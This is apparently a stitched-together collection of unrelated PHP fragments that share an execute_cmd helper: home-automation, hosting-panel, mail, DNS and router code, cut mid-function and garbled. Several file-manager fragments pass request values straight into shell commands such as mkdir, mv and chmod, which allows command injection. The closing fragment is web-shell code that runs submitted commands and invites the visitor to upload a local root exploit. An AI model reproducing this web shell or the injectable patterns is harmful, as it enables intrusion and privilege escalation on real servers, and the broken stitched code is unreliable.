/**
* Uptime
*
* Description: Return the result for the uptime command
*
*/
function uptime()
{
try {
$rs = execute_cmd("uptime", true);
return $rs[0];
} catch (Exception $e) {
return "";
}
}
function &getModList()
{
if (!isset($this->modlist)) {
$_SESSION['load_count'] += 1;
$modlistinstance = execute_cmd($this->config['heyuexecreal'] . " modlist");
$this->modlist =& $modlistinstance;
}
return $this->modlist;
}
logout();
break;
case 2:
config_form();
break;
case 3:
download();
break;
case 4:
view();
break;
case 5:
server_info();
break;
case 6:
execute_cmd();
break;
case 7:
edit_file_form();
break;
case 8:
chmod_form();
break;
case 9:
shell_form();
break;
case 10:
upload_form();
break;
case 11:
execute_file();
} else {
//is_dir false
$errorsList = array("Fail: cannot create " . $params["dst"]);
}
}
// is_dir
break;
case "FIX_DIR":
$returned = execute_cmd($FIXPERM, array('-d', $params["dir"]));
if ($returned['return_val'] != 0) {
$errorsList = array("Fixperms.sh failed, returned error code : " . $returned['return_val']);
}
break;
case "FIX_FILE":
#@exec("$FIXPERM -f ".$params["file"]." 2>&1", $trash, $code);
$returned = execute_cmd($FIXPERM, array('-f', $params["file"]));
if ($returned['return_val'] != 0) {
$errorsList = array("Fixperms.sh failed, returned error code : " . $returned['return_val']);
}
break;
default:
$errorsList[] = array("Fail: Sorry, i do not know this type of action: " . $r['type']);
break;
}
// We finished the action, notify the DB.
d("Finishing... return value is : {$return}\n");
if (!$action->finish($r["id"], addslashes($return))) {
$errorsList[] = "Cannot finish the action! Error while inserting the error value in the DB for action n°" . $r["id"] . " : action '" . $r["type"] . "'\nReturn value: " . addslashes($return) . "\n";
break;
// Else we go into an infinite loop... AAAAHHHHHH
}
function setToRuntimeNode($blocked_channel, $timeleft)
{
/* find blocked channel if already in runtime node */
$blocked_chn_total = query("/runtime/dfs/blocked/entry#");
/* if blocked channel exist before, use the old index. */
$index = 1;
while ($index <= $blocked_chn_total) {
if ($blocked_chn_total == 0) {
break;
}
$ch = query("/runtime/dfs/blocked/entry:" . $index . "/channel");
if ($ch == $blocked_channel) {
break;
}
$index++;
}
set("/runtime/dfs/blocked/entry:" . $index . "/channel", $blocked_channel);
execute_cmd("xmldbc -t \"dfs-" . $blocked_channel . ":" . $timeleft . ":xmldbc -X /runtime/dfs/blocked/entry:" . $index . "\"");
//execute_cmd("xmldbc -t \"dfs-".$blocked_channel.":5:xmldbc -X /runtime/dfs/blocked/entry:".$index."\"");
}
/**
* Description: Erase computer interface
*/
function heyu_erase()
{
global $config;
return execute_cmd($config['heyuexecreal'] . " erase");
}
function filemanager_right()
{
global $islinux, $cmd_arg, $chmod_arg, $zip_dir, $fm_root_atual;
global $dir_dest, $dir_actual, $dir_antes;
global $selected_file_list, $selected_dir_list, $old_name, $new_name;
global $action, $or_by, $order_dir_list_by;
if (!isset($order_dir_list_by)) {
$order_dir_list_by = "1A";
setcookie("order_dir_list_by", $order_dir_list_by, $cookie_cache_time, "/");
} elseif (strlen($or_by)) {
$order_dir_list_by = $or_by;
setcookie("order_dir_list_by", $or_by, $cookie_cache_time, "/");
}
filemanager_html_header();
echo "<body>\n";
if ($action) {
switch ($action) {
case 1:
// crear directorio
if (strlen($cmd_arg)) {
$cmd_arg = filemanager_formatpath($dir_actual . $cmd_arg);
if (!file_exists($cmd_arg)) {
execute_cmd("mkdir {$cmd_arg}");
execute_cmd("chown " . _CFG_PUREFTPD_VIRTUALUSER . "." . _CFG_PUREFTPD_VIRTUALGROUP . " {$cmd_arg}");
//mkdir($cmd_arg,0777);
//chmod($cmd_arg,0777);
filemanager_reloadframe("parent", 2, "&ec_dir=" . $cmd_arg);
} else {
filemanager_alert(T_('File or directory already exists') . ".");
}
}
break;
case 2:
// crear archivo
if (strlen($cmd_arg)) {
$cmd_arg = $dir_actual . $cmd_arg;
if (!file_exists($cmd_arg)) {
execute_cmd("touch {$cmd_arg}");
execute_cmd("chown " . _CFG_PUREFTPD_VIRTUALUSER . "." . _CFG_PUREFTPD_VIRTUALGROUP . " {$cmd_arg}");
//if ($fh = @fopen($cmd_arg, "w")){
// @fclose($fh);
//}
//chmod($cmd_arg,0666);
} else {
filemanager_alert(T_('File or directory already exists') . ".");
}
}
break;
case 3:
// renombrar archivo o directorio
if (strlen($old_name) && strlen($new_name)) {
execute_cmd("mv {$dir_actual}{$old_name} {$dir_actual}{$new_name}");
//rename($dir_actual.$old_name,$dir_actual.$new_name);
if (is_dir($dir_actual . $new_name)) {
filemanager_reloadframe("parent", 2);
}
}
break;
case 4:
// borrar seleccion
if (strstr($dir_actual, $fm_root_atual)) {
if (strlen($selected_file_list)) {
$selected_file_list = explode("<|*|>", $selected_file_list);
if (count($selected_file_list)) {
for ($x = 0; $x < count($selected_file_list); $x++) {
$selected_file_list[$x] = trim($selected_file_list[$x]);
if (strlen($selected_file_list[$x])) {
filemanager_total_delete($dir_actual . $selected_file_list[$x], $dir_dest . $selected_file_list[$x]);
}
}
}
}
if (strlen($selected_dir_list)) {
$selected_dir_list = explode("<|*|>", $selected_dir_list);
if (count($selected_dir_list)) {
for ($x = 0; $x < count($selected_dir_list); $x++) {
$selected_dir_list[$x] = trim($selected_dir_list[$x]);
if (strlen($selected_dir_list[$x])) {
filemanager_total_delete($dir_actual . $selected_dir_list[$x], $dir_dest . $selected_dir_list[$x]);
}
}
filemanager_reloadframe("parent", 2);
}
}
}
break;
case 5:
// copiar seleccion
if (strlen($dir_dest)) {
if (strtoupper($dir_dest) != strtoupper($dir_actual)) {
if (strlen($selected_file_list)) {
$selected_file_list = explode("<|*|>", $selected_file_list);
if (count($selected_file_list)) {
for ($x = 0; $x < count($selected_file_list); $x++) {
$selected_file_list[$x] = trim($selected_file_list[$x]);
if (strlen($selected_file_list[$x])) {
filemanager_total_copy($dir_actual . $selected_file_list[$x], $dir_dest . $selected_file_list[$x]);
}
}
}
}
if (strlen($selected_dir_list)) {
$selected_dir_list = explode("<|*|>", $selected_dir_list);
if (count($selected_dir_list)) {
for ($x = 0; $x < count($selected_dir_list); $x++) {
$selected_dir_list[$x] = trim($selected_dir_list[$x]);
if (strlen($selected_dir_list[$x])) {
filemanager_total_copy($dir_actual . $selected_dir_list[$x], $dir_dest . $selected_dir_list[$x]);
}
}
filemanager_reloadframe("parent", 2);
}
}
$dir_actual = $dir_dest;
}
}
break;
case 6:
// mover seleccion
if (strlen($dir_dest)) {
if (strtoupper($dir_dest) != strtoupper($dir_actual)) {
if (strlen($selected_file_list)) {
$selected_file_list = explode("<|*|>", $selected_file_list);
if (count($selected_file_list)) {
for ($x = 0; $x < count($selected_file_list); $x++) {
$selected_file_list[$x] = trim($selected_file_list[$x]);
if (strlen($selected_file_list[$x])) {
filemanager_total_move($dir_actual . $selected_file_list[$x], $dir_dest . $selected_file_list[$x]);
}
}
}
}
if (strlen($selected_dir_list)) {
$selected_dir_list = explode("<|*|>", $selected_dir_list);
if (count($selected_dir_list)) {
for ($x = 0; $x < count($selected_dir_list); $x++) {
$selected_dir_list[$x] = trim($selected_dir_list[$x]);
if (strlen($selected_dir_list[$x])) {
filemanager_total_move($dir_actual . $selected_dir_list[$x], $dir_dest . $selected_dir_list[$x]);
}
}
filemanager_reloadframe("parent", 2);
}
}
$dir_actual = $dir_dest;
}
}
break;
case 8:
// borrar archivo o directorio
if (strlen($cmd_arg)) {
if (file_exists($dir_actual . $cmd_arg)) {
filemanager_total_delete($dir_actual . $cmd_arg);
}
if (is_dir($dir_actual . $cmd_arg)) {
filemanager_reloadframe("parent", 2);
}
}
break;
case 9:
// CHMOD
if (strlen($chmod_arg) == 4 && strlen($dir_actual)) {
if ($chmod_arg[0] == "1") {
$chmod_arg = "0" . $chmod_arg;
} else {
$chmod_arg = "0" . substr($chmod_arg, strlen($chmod_arg) - 3);
}
$new_mod = $chmod_arg;
//octdec($chmod_arg);
$selected_file_list = explode("<|*|>", $selected_file_list);
if (count($selected_file_list)) {
for ($x = 0; $x < count($selected_file_list); $x++) {
if ($selected_file_list[$x] != "") {
execute_cmd("chmod {$new_mod} " . $dir_actual . $selected_file_list[$x]);
}
}
}
//@chmod($dir_actual.$selected_file_list[$x],$new_mod);
$selected_dir_list = explode("<|*|>", $selected_dir_list);
if (count($selected_dir_list)) {
for ($x = 0; $x < count($selected_dir_list); $x++) {
if ($selected_dir_list[$x] != "") {
execute_cmd("chmod {$new_mod} " . $dir_actual . $selected_dir_list[$x]);
}
}
}
//@chmod($dir_actual.$selected_dir_list[$x],$new_mod);
}
break;
}
if ($action != 10) {
filemanager_dir_list_form();
}
} else {
filemanager_dir_list_form();
}
echo "</body>\n</html>";
}
function ezmlm_homedir($dominio)
{
$array_listado = array();
$exec_cmd = _CFG_VPOPMAIL_INFODOMAIN;
$result = execute_cmd("{$exec_cmd} -a {$dominio}|" . _CFG_CMD_GREP . " -e " . _CFG_VPOPMAIL_CFG_DIR . " |" . _CFG_CMD_CUT . " -d\":\" -f2");
return trim($result[0]);
}
function vpopmail_domainonoff($dominio, $estado)
{
$exec_cmd = _CFG_VPOPMAIL_DOMAINLIMITS;
if ($estado == 1) {
$result = execute_cmd("{$exec_cmd} -g o {$dominio}");
} else {
$result = execute_cmd("{$exec_cmd} -g pwi {$dominio}");
}
}
function bind_control($accion)
{
$exec_cmd = _CFG_BIND_BINDCTL;
$result = execute_cmd("{$exec_cmd} {$accion}");
return $result;
}
$bad_cmd = false;
if (isset($_POST["command"])) {
$requested_cmd = " " . $_POST["command"];
} else {
$requested_cmd = "";
}
$requested_args = " " . $_POST["arguments"];
// add a space to get a non-zero value when checking
// check command and arguments for any restricted commands
foreach ($restricted_cmds as $restricted_cmd) {
$cmd_pos = strpos(strtolower($requested_cmd), $restricted_cmd);
if ($cmd_pos == false) {
$cmd_pos = strpos(strtolower($requested_args), $restricted_cmd);
if ($cmd_pos != false) {
$bad_cmd = true;
}
} else {
$bad_cmd = true;
}
}
if ($bad_cmd == true) {
$err_lines = array("domus.Link Utility restricted command cannot be executed: <b>" . $requested_cmd . " " . $requested_args . "</b>", " ");
$tpl_body->set('out_lines', $err_lines);
} else {
// execute the heyu command and return output
$tpl_body->set('out_lines', execute_cmd($config['heyuexecreal'] . " " . $requested_cmd . " " . $requested_args, true));
}
}
## Display the page
$tpl->set('content', $tpl_body);
echo $tpl->fetch(TPL_FILE_LOCATION . 'layout.tpl');
function awstats_filesave_conf($dominio, $usuario, $contenido)
{
$filename = _CFG_AWSTATS_CONF . "awstats.{$dominio}.conf";
if (!($handle = fopen($filename, 'w'))) {
echo "No se ha podido abrir el fichero ({$filename})";
return false;
exit;
}
//Si no le pasamos el fichero awstats lo generamos
if ($contenido == "") {
$contenido = awstats_generartemplate($dominio, $usuario);
} else {
$convertir = array();
$convertir = explode("\n", $contenido);
$contenido = "";
foreach ($convertir as $line) {
if (stristr($line, "AllowAccessFromWebToFollowingAuthenticatedUsers=") != false) {
$contenido .= "AllowAccessFromWebToFollowingAuthenticatedUsers=\"{$usuario}\"\n";
} else {
$contenido .= "{$line}\n";
}
}
}
$contenido = stripslashes($contenido);
$contenido = str_replace("\r", "", $contenido);
if (fwrite($handle, $contenido) === FALSE) {
echo "No se ha podido abrir el fichero ({$filename})";
return false;
exit;
}
fclose($handle);
//Genera el directorio para los datos del awstats
$exec_cmd = "mkdir";
$result = execute_cmd("{$exec_cmd} " . _CFG_AWSTATS_DATADIR . "{$dominio}");
$exec_cmd = "chown";
$result = execute_cmd("{$exec_cmd} " . _CFG_SUDO_USERNAME . " " . _CFG_AWSTATS_DATADIR . "{$dominio}");
return true;
}
function sysinfo_osversion()
{
$exec_cmd = _CFG_CMD_UNAME;
$result = execute_cmd("{$exec_cmd} -r -s");
return $result[0];
}
function apache_descargarlog($dominio, $flag)
{
switch ($flag) {
case "hoy":
$fecha = date("d") . date("m") . date("Y");
$file_nombre = $dominio . _CFG_LOGROTATE_CFG_AWSTATSTRING;
break;
case "ayer":
$dia_anterior = DateAdd("d", -1, mktime(0, 0, 0, date("m"), date("d"), date("Y")));
$fecha = date("d", $dia_anterior) . date("m", $dia_anterior) . date("Y", $dia_anterior);
$file_nombre = $dominio . _CFG_LOGROTATE_CFG_AWSTATSTRING . ".1";
break;
}
if (file_exists(_CFG_APACHE_LOGS . $file_nombre)) {
$exec_cmd = "gzip";
$path = "/tmp/{$file_nombre}.gz";
$result = execute_cmd("{$exec_cmd} -9 -c " . _CFG_APACHE_LOGS . "{$file_nombre} >{$path}");
$datos = fopen($path, "r");
if ($datos) {
$download_name = $dominio . "-" . $fecha . ".gz";
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename={$download_name}");
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($path));
$tamano = filesize($path) - 1;
header("Content-range: bytes 0-" . filesize($path) . "/" . $tamano);
while (!feof($datos)) {
$buffer = fgets($datos, 4096);
echo $buffer;
}
}
$result = execute_cmd("rm -f /tmp/{$file_nombre}.gz");
} else {
return false;
}
}
function filesystem_crearsubdomain($homedir)
{
if (!file_exists($homedir) and $homedir != "") {
//Crea el directorio
$result = execute_cmd("mkdir {$homedir}");
//Asigna permisos al directorio
$result = execute_cmd("chown " . _CFG_PUREFTPD_VIRTUALUSER . "." . _CFG_PUREFTPD_VIRTUALGROUP . " {$homedir}");
}
}
return false;
}
}
function check_os()
{
if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") {
exit("<p class='red'>Only works on Linux</p></body></html>");
}
}
################################ MAKMAN_MAIN #########################################
check_os();
if (check_user($user)) {
echo "<p class='green'>Session (User) exists. Insert commands to execute.</p>";
echo "<textarea>";
if (isset($_POST["cmd"])) {
execute_cmd($script, $pexpect, $path . $pmakman, $path . $pscript);
}
echo "</textarea>";
echo "\n <center>\n <form method='POST' action=''>\n <input name='cmd' type='text' autofocus><br>\n <input name='Submit' value='Submit' type='submit'><br>\n </form>\n </center>\n ";
} else {
if (isset($_POST["check_exploit"])) {
echo "<textarea>";
execute_exploit($path . $exploit, $script_exploit, $pexpect, $path . $pmakman, $path . $pexploit);
echo "</textarea>";
header("Refresh:2");
}
echo "<p class='red'>Session (User) not found. Upload your local root exploit to execute.</p>";
echo "\n <center>\n <form method='POST' action='' enctype='multipart/form-data'>\n <input name='check_exploit' type='hidden' value='1'>\n <input name='exploit' type='file'>\n <input name='Submit' value='Submit' type='submit'><br>\n </form>\n </center>\n ";
}
?>
